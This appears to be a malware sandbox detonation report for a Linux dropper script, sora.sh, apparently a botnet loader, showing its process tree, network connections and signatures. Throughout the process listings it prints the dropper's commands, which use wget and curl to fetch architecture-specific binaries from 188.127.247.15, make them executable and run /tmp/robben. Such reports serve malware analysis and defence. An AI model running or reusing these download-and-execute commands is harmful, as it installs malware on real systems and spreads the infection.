/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm7]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.ppc]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.m68k]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.sh4]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-29 20:35
Reported
2024-08-29 20:38
Platform
debian9-mipsel-20240611-en
Max time kernel
35s
Max time network
36s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.x86]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.mips]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.i468]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.i686]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm4]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm5]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm6]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm7]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.ppc]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.m68k]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.sh4]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |
| CZ | 188.127.247.15:80 | | tcp |